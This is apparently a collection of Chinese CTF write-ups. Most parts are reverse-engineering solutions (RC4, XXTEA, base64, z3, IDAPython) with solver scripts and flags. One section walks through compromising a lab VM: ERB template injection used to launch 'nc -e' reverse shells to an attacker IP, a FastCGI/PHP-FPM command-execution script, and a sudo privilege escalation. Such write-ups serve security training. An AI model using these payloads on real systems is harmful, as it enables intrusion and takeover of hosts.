继续看crypt1 和 crypt2, 是魔改的rc4

before_main函数加密key，秘钥是keykey

after_main函数使用加密之后的key作为秘钥加密了flag

exp：

def crypt1(s,key, key_len):
    v5 = 0
    v6 = 0
    res = []
    for i in range(key_len):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        v4 = s[v5]
        s[v5] = s[v6]
        s[v6] = v4
        res.append(key[i] ^ (s[(s[v5] + s[v6]) %256]))
    return res

def crypt2(s,enc,enc_len):
    v5 = 0
    v6 = 0
    res = []
    for i in range(enc_len):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        v4 = s[v5]
        s[v5] = s[v6]
        s[v6] = v4
        res.append(enc[i] + s[(s[v5] + s[v6])%256])
    return res

def init(s,key,key_len):
    v8 = [0]*258
    for i in range(256):
        s[i] = i
        v8[i] = key[i % key_len]
    v6 =0
    for j in range(256):
        v6 = (v8[j] + v6 + s[j]) % 256
        v4 = s[j]
        s[j] = s[v6]
        s[v6] = v4

s = [0]*256
key1 = [ord(b) for b in "keykey"]
key = [ord(b) for b in "ban_debug!"]
init(s,key1,len(key1))

res = crypt1(s,key,len(key))
print(res)
s2 = [0]*256
key2 = init(s2, res,len(res))

enc = [0x4E, 0x47, 0x38, 0x47, 0x62, 0x0A, 0x79, 0x6A, 0x03, 0x66, 
  0xC0, 0x69, 0x8D, 0x1C, 0x84, 0x0F, 0x54, 0x4A, 0x3B, 0x08, 
  0xE3, 0x30, 0x4F, 0xB9, 0x6C, 0xAB, 0x36, 0x24, 0x52, 0x81, 
  0xCF]
flag = crypt2(s2,enc,len(enc))

for i in flag:
    print(chr(i%256),end="")

    
'''
运行结果
[105, 13, 90, 178, 64, 234, 25, 63, 47, 106]
flag{1237-12938-9372-1923-4u92}
'''
    

reverse2

思路:

有upx， 十六进制查看upx特征是否被修改

将这三个ABC改回成UPX就能脱壳

ida分析代码

main函数中看到一个密文

往下看 很明显的base64加密，查看a9876543210zyxw数组

是base64换表

exp:

赛博厨子直接一把梭

nmap扫端口

nmap -sS 10.20.73.121 -T4

Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:48 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00010s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
MAC Address: 00:0C:29:82:76:43 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

开了22 和 3000端口，nmap -sV 扫详细服务

nmap -sV  10.20.73.121 -p3000,22

┌──(root㉿kali)-[~]
└─# nmap -sV  10.20.73.121 -p3000,22
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:49 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00031s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
3000/tcp open  ssl/ppp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%T=SSL%I=7%D=9/16%Time=66E7E361%P=x86_64-pc-linux-gn
SF:u%r(GenericLines,3EF,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Len
SF:gth:\x20930\r\n\r\nPuma\x20caught\x20this\x20error:\x20Invalid\x20HTTP\
SF:x20format,\x20parsing\x20fails\.\x20Are\x20you\x20trying\x20to\x20open\
SF:x20an\x20SSL\x20connection\x20to\x20a\x20non-SSL\x20Puma\?\x20\(Puma::H
SF:ttpParserError\)\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/li
SF:b/puma/client\.rb:268:in\x20`execute'\n/usr/local/rvm/gems/ruby-3\.1\.0
SF:/gems/puma-6\.4\.2/lib/puma/client\.rb:268:in\x20`try_to_finish'\n/usr/
SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/server\.rb:298:i
SF:n\x20`reactor_wakeup'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\
SF:.2/lib/puma/server\.rb:248:in\x20`block\x20in\x20run'\n/usr/local/rvm/g
SF:ems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:119:in\x20`wake
SF:up!'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/react
SF:or\.rb:76:in\x20`block\x20in\x20select_loop'\n/usr/local/rvm/gems/ruby-
SF:3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:in\x20`select'\n/usr/
SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:i
SF:n\x20`select_loop'\n/usr/loc")%r(GetRequest,169E,"HTTP/1\.0\x20403\x20F
SF:orbidden\r\ncontent-type:\x20text/html;\x20charset=UTF-8\r\nContent-Len
SF:gth:\x205702\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n
SF:\x20\x20<meta\x20charset=\"utf-8\"\x20/>\n\x20\x20<meta\x20name=\"viewp
SF:ort\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\x20\x20<
SF:meta\x20name=\"turbo-visit-control\"\x20content=\"reload\">\n\x20\x20<t
SF:itle>Action\x20Controller:\x20Exception\x20caught</title>\n\x20\x20<sty
SF:le>\n\x20\x20\x20\x20body\x20{\n\x20\x20\x20\x20\x20\x20background-colo
SF:r:\x20#FAFAFA;\n\x20\x20\x20\x20\x20\x20color:\x20#333;\n\x20\x20\x20\x
SF:20\x20\x20color-scheme:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20supp
SF:orted-color-schemes:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20margin:
SF:\x200px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20body,\x20p,\x20ol,\x20ul
SF:,\x20td\x20{\n\x20\x20\x20\x20\x20\x20font-family:\x20helvetica,\x20ver
SF:dana,\x20arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20font-size:\x20\
SF:x20\x2013px;\n\x20\x20\x20\x20\x20\x20line-height:\x2018px;\n\x20\x20\x
SF:20\x20}\n\n\x20\x20\x20\x20pre\x20{\n\x20\x20\x20\x20\x20\x20font-size:
SF:\x2011px;\n\x20\x20\x20\x20\x20\x20white-space:\x20pre-wrap;\n\x20\x20\
SF:x20\x20}\n\n\x20\x20\x20\x20pre\.box\x20{\n\x20\x20\x20\x20\x20\x20bord
SF:er:\x201px\x20solid\x20#EEE;\n\x20\x20\x20\x20\x20\x20padding:\x2010px;
SF:\n\x20\x20\x20\x20\x20\x20margin:\x200px;\n\x20\x20\x20\x20\x20\x20widt
SF:h:\x20958px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20header\x20{\n\x20\x2
SF:0\x20\x20\x20\x20color:\x20#F0F0F0;\n\x20\x20\x20\x20\x20\x20background
SF::\x20#C00;\n\x20\x20\x20\x20\x20\x20padding:");
MAC Address: 00:0C:29:82:76:43 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.17 seconds

看到了ssl，尝试使用https访问

漏洞发现

web打点

查看这五个链接，如图所示，这五个链接都是黑客工具

接下来测试下面的输入框

随意输入内容提示Product does not exist

发现这串字符串就是message的参数，修改message为123查看

提示的字符变成了123，这边很明显有一个xss漏洞

不过并没什么用

查看网站变成语言，是ruby

Ruby/ERB ssti

经过搜索，这里是ERB的ssti，可用使用<%= (ruby代码) %>模板来执行命名

测试一下，将<%= 7*7 %>url编码传入

输入了49，说名存在漏洞

尝试反弹shell

构造反弹shell命令

<%= system("nc -e /bin/sh 10.20.73.233 5555"); %>

有pyhton ，使用python开一下虚拟终端

python3 -c "import pty;pty.spawn('/bin/bash')"

提权

在本地开了一个80，9000端口，将这两个端口转发出来

lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 & 
<CP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 & 
[1] 1281
lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:8080,reuseaddr,fork TCP:127.0.0.1:80 & 
< TCP-LISTEN:8080,reuseaddr,fork TCP:127.0.0.1:80 & 
[2] 1282
lidia@hacktoys:/tmp$ ss -nltp 
ss -nltp 
State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess                         
LISTEN 0      5            0.0.0.0:8080      0.0.0.0:*    users:(("socat",pid=1282,fd=5))
LISTEN 0      511        127.0.0.1:80        0.0.0.0:*                                   
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*                                   
LISTEN 0      4096       127.0.0.1:9000      0.0.0.0:*                                   
LISTEN 0      1024         0.0.0.0:3000      0.0.0.0:*    users:(("ruby",pid=593,fd=7))  
LISTEN 0      5            0.0.0.0:9001      0.0.0.0:*    users:(("socat",pid=1281,fd=5))
LISTEN 0      128             [::]:22           [::]:*                                                                

访问转发出来的 80端口

测了半天也找到什么漏洞

转移目标至9000端口

发现靶机进程中有php-fpm，它的默认端口正好是9000

https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi

在网上找到大佬的的脚本可以直接命令执行

改个端口和路径就能直接打

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT

    cat $OUTPUT
done

发现使用dodi用户，直接反弹shell提权至该用户

提权至dodi

修改执行的命令

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('nc -e /bin/bash 10.20.73.233 6666'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT

    cat $OUTPUT
done

提权至root

sudo -l 发现该用户可以使用sudo运行/usr/local/bin/rvm_rails.sh这个脚本

运行脚本

dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
sudo /usr/local/bin/rvm_rails.sh
Usage:
  rails COMMAND [options]

You must specify a command:

  new          Create a new Rails application. "rails new my_app" creates a
               new application called MyApp in "./my_app"
  plugin new   Create a new Rails railtie or engine

All commands can be run with -h (or --help) for more information.

Inside a Rails application directory, some common commands are:

  console      Start the Rails console
  server       Start the Rails server
  test         Run tests except system tests

发现是rails

Rails 是使用Ruby 语言编写的网页程序开发框架

分析脚本

#!/bin/bash
export rvm_prefix=/usr/local
export MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.1.0
export RUBY_VERSION=ruby-3.1.0
export rvm_version=1.29.12
export rvm_bin_path=/usr/local/rvm/bin
export GEM_PATH=/usr/local/rvm/gems/ruby-3.1.0:/usr/local/rvm/gems/ruby-3.1.0@global
export GEM_HOME=/usr/local/rvm/gems/ruby-3.1.0
export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/rvm/gems/ruby-3.1.0@global/bin:/usr/local/rvm/rubies/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/rvm/bin
export IRBRC=/usr/local/rvm/rubies/ruby-3.1.0/.irbrc
export rvm_path=/usr/local/rvm
exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"

脚本之后执行了/usr/local/rvm/gems/ruby-3.1.0/bin/rails这个文件

dodi@hacktoys:/var/www/html$ cat /etc/group | grep rvm
cat /etc/group | grep rvm
rvm:x:1002:lidia,root

lidia用户对该文件有修改权限，使用该用户在这个文件中写入/bin/bash即可提权

lidia@hacktoys:/tmp$ echo "/bin/bash" > /usr/local/rvm/gems/ruby-3.1.0/bin/rails
<in/bash" > /usr/local/rvm/gems/ruby-3.1.0/bin/rails
lidia@hacktoys:/tmp$ 

dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
sudo /usr/local/bin/rvm_rails.sh
root@hacktoys:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root),1002(rvm)

ida查看打开，直接看伪代码

程序逻辑很简单，将输入保存到buff，经过cry函数加密，和密文v6进行比较

直接查看cry函数

经过分析，这是一个魔改的xxtea加密，改了循环轮数和DELTA值

写脚本解密enc

#include <stdio.h>  
#include <stdint.h>  
#define DELTA 0x9e3779b9  
  
void btea(uint32_t *v, int n, uint32_t const key[4])  
{  
    uint32_t y, z, sum;  
    unsigned i, rounds, e;
    rounds = 415 / n + 114; //确定轮转数
    sum = rounds*DELTA;  //根据轮转数计算sum
    y = v[0];  
    do  
    {  
        e = (sum >> 2) & 3;  
        for (i=n-1; i>0; i--) //逆序倒推
        {  
            z = v[i-1];  //先解密v[n-1]，需要知道v[0]和v[n-2]，
            v[i] -= (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(i&3)^e] ^ z)));  
            y = v[i];//只会解密到v[1]
        }  
        z = v[n-1]; //对于第一个v[0]的解密，要知道v[n-1]和v[1] 
        v[0] -= (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(i&3)^e] ^ z)));  
        y = v[0]; 
        sum += 0x61C88647;
    }  
    while (--rounds);  
}  
  
  
int main()  
{  
    uint32_t enc_data[] = {0x480AC20C,0x0CE9037F2,0x8C212018,0x0E92A18D,0x0A4035274,0x2473AAB1,0x0A9EFDB58,0x0A52CC5C8,0x0E432CB51,0x0D04E9223,0x6FD07093}; 
    uint32_t const k[4]= {0x79696755,0x67346F6C,0x69231231,0x5F674231};  
    int n= 11; 
    btea(enc_data, n, k);
    for(int i = 0; i < sizeof(enc_data)/sizeof(uint32_t); i++)
    {
        printf("%x", enc_data[i]);
    }

    return 0;  
}

运行结果：

67616c666366657b6638666363302d30312d37392d636532306532383963302d34323964333365327d35

为了方便使用python将这段十六进制转换成string

enc = "67616c666366657b6638666363302d30312d37392d636532306532383963302d34323964333365327d35"

for i in range(0,len(enc), 2):
    print(chr(int(enc[i:i+2], 16)),end="")

运行结果:

galfcfe{f8fcc0-01-79-ce20e289c0-429d33e2}5

发现flag的顺序不对，应该是大小端序的原因，修改代码

enc = "67616c666366657b6638666363302d30312d37392d636532306532383963302d34323964333365327d35"
flag=''

for i in range(0,len(enc), 2):
    flag += chr(int(enc[i:i+2], 16))

for i in range(0,len(flag),4):
    print((flag[i:i+4][::-1]),end="")

运行结果:

flag{efccf8f0-0c97-12ec-82e0-0c9d9242e335}

re2

直接上ida查看伪代码

这里是一堆赋值，最后将这些变量传入了sub_401005函数，跟进去查看

这就是个rc4加密，我们在return上打个断点就能看到解密后的数据

成功getflag

64位无壳exe

直接使用ida打开

对变量名进行简单的处理， 提升代码的可读性

对代码进行简单分析

Str2加密的flag

Str为用户的输入

通过三个函数对Str进行三次加密，最终和Str2进行比较

直接看encode_three函数

这个函数对字符串进行了偏移，有mod操作就不考虑逆向推了，直接使用暴力破解

再看encode_two函数

这个函数对字符串进行了位移，每次位移13个字符

再看最后一个函数encode_one

这个函数也是一眼丁真了，base64

查看alphabet变量，正是base64的码表

写脚本还原flag

exp：

import base64

enc = "EmBmP5Pmn7QcPU4gLYKv5QcMmB3PWHcP5YkPq3=cT6QckkPckoRG"
enc_decode = ""
enc_decoee_2 = ""
for enum in range(len(enc)):
    for enum_char in range(32,128):
        if enum_char <= 64 or enum_char > 90:
            if enum_char<= 96 or enum_char > 122 :
                if enum_char <= 47 or enum_char > 57:
                    if enc[enum] == chr(enum_char): 
                        enc_decode += chr(enum_char)  
                else:
                    if enc[enum] == chr((enum_char - 48 + 3) % 10 +48):
                        enc_decode += chr(enum_char)
            else:
                if enc[enum] == chr((enum_char - 97 + 3) % 26 + 97):
                    enc_decode  += chr(enum_char)
        else:
            if enc[enum] ==  chr((enum_char - 65 + 3) % 26 + 65):
                enc_decode +=  chr(enum_char)
                
enc_decoee_2 += enc_decode[13:26]
enc_decoee_2 += enc_decode[39:52]
enc_decoee_2 += enc_decode[0:13]
enc_decoee_2 += enc_decode[26:39]
print(base64.b64decode(enc_decoee_2.encode()))

总结：

• 知识点：

  • 暴力破解

flag

GWHT{672cc4778a38e80cb362987341133ea2}

64位elf，无壳

直接使用ida打开，查看主函数

映入眼帘就是一个CODE XREF和一大堆数据，这肯定是花指令

尝试去除花指令

发现有多出了一个花指令

继续重复去除花指令

发现疑似flag的字符

这种重复的操作直接交给idapython

这些字符前面都有FF C0，写脚本通过这两个关键字找出字符

exp:

start_addr = 0x1135
end_addr = 0x3000

for i in range(start_addr, end_addr):
   if ida_bytes.get_byte(i) == 0xFF and ida_bytes.get_byte(i+1) == 0xC0:
       print(chr(ida_bytes.get_byte(i+3)), end="")

运行结果：

hello world!
There are moments in life when you miss someone so much that you just want to pick them from your dreams and hug them for real! Dream what you want to dream;go where you want to go;be what you want to be,because you have only one life and one chance to do all the things you want to do.
May you have enough happiness to make you sweet,enough trials to make you strong,enough sorrow to keep you human,enough hope to make you happy? Always put yourself in others'shoes.If you feel that it hurts you,it probably hurts the other person, too.

GFCTF{u_are2wordy}
You find Flag, Congratulation!

总结：

考点：

• 花指令
• idapython

flag:

GFCTF{u_are2wordy}

查看程序主函数

使sub_860函数返回true就能获得flag

跟进去查看

看到这么规律的计算就知道要拿z3秒了

exp：

from z3 import *

v1,v2, v3, v4, v5, v6, v7, v8, v9, v11 = Ints('v1 v2 v3 v4 v5 v6 v7 v8 v9 v11')

solver = Solver()
solver.add(v1 < 128)
solver.add(v2 < 128)
solver.add(v3 < 128)
solver.add(v4 < 128)
solver.add(v5 < 128)
solver.add(v6 < 128)
solver.add(v7 < 128)
solver.add(v8 < 128)
solver.add(v9 < 128)
solver.add(v11 < 128)

solver.add(-85 * v9 + 58 * v8 + 97 * v6 + v7 + -45 * v5 + 84 * v4 + 95 * v2 - 20 * v1 + 12 * v3 == 12613)
solver.add(30 * v11 + -70 * v9 + -122 * v6 + -81 * v7 + -66 * v5 + -115 * v4 + -41 * v3 + -86 * v1 - 15 * v2 - 30 * v8 == -54400)
solver.add(-103 * v11 + 120 * v8 + 108 * v7 + 48 * v4 + -89 * v3 + 78 * v1 - 41 * v2 + 31 * v5 - (v6 *64) - 120 * v9 == -10283)
solver.add(71 * v6 + (v7 * 128) + 99 * v5 + -111 * v3 + 85 * v1 + 79 * v2 - 30 * v4 - 119 * v8 + 48 * v9 - 16 * v11 == 22855)
solver.add(5 * v11 + 23 * v9 + 122 * v8 + -19 * v6 + 99 * v7 + -117 * v5 + -69 * v3 + 22 * v1 - 98 * v2 + 10 * v4 == -2944)
solver.add(-54 * v11 + -23 * v8 + -82 * v3 + -85 * v2 + 124 * v1 - 11 * v4 - 8 * v5 - 60 * v7 + 95 * v6 + 100 * v9 == -2222)
solver.add(-83 * v11 + -111 * v7 + -57 * v2 + 41 * v1 + 73 * v3 - 18 * v4 + 26 * v5 + 16 * v6 + 77 * v8 - 63 * v9 == -13258)
solver.add(81 * v11 + -48 * v9 + 66 * v8 + -104 * v6 + -121 * v7 + 95 * v5 + 85 * v4 + 60 * v3 + -85 * v2 + 80 * v1 == -1559)
solver.add(101 * v11 + -85 * v9 + 7 * v6 + 117 * v7 + -83 * v5 + -101 * v4 + 90 * v3 + -28 * v1 + 18 * v2 - v8 == 6308)
solver.add(99 * v11 + -28 * v9 + 5 * v8 + 93 * v6 + -18 * v7 + -127 * v5 + 6 * v4 + -9 * v3 + -93 * v1 + 58 * v2 == -1697)

if solver.check() == sat:
    print (solver.model())


flag = [70,48,117,82,84,121,95,55,119,64]


for i in flag:
    print(chr(i), end="")

右移可以使用乘法代替

flag：

actf{F0uRTy_7w@_42}

是个64位程序，直接拿ida打开

发现程序将用户输入和字符串zer0pts{********CENSORED********}比较

尝试提交flag 发现是错误的

继续分析

查看init函数

程序分别调用了funcs_889开始的几个函数

跟进去查看

跟进sub_6E 发现没东西

在这个函数附近看到了sub_795

跟进去查看

这个函数将qword_201090函数替换成strcmp

off_201028替换成了sub_6EA

跟进off_201028查看

正是 strcmp在plt表中的位置

查看sub_6EA函数的逻辑

只要按照上面的代码加回qword_201060中的值就能还原flag

exp

#include<stdio.h>
#include<stdint.h>
#include<string.h>
int main()
{
    char enc[] = "zer0pts{********CENSORED********}";
    uint64_t key[] = {0, 0x410A4335494A0942, 0x0B0EF2F50BE619F0, 0x4F0A3A064A35282B, 0};
    int len = strlen(enc);
    len = (len>>3) +1;
    for(int i =0; i < len; i++)
    {
        *(uint64_t *)&(enc[8 * i]) += key[i];
    }
    printf("%s", enc);

    return 0;
}

因为是qword数据类型，所有要使用uint64_t或者__int64

这里不直接写enc[8 * i]是因为要将char型转换成_int64, 用指针的形式写

flag

zer0pts{l3ts_m4k3_4_DETOUR_t0d4y}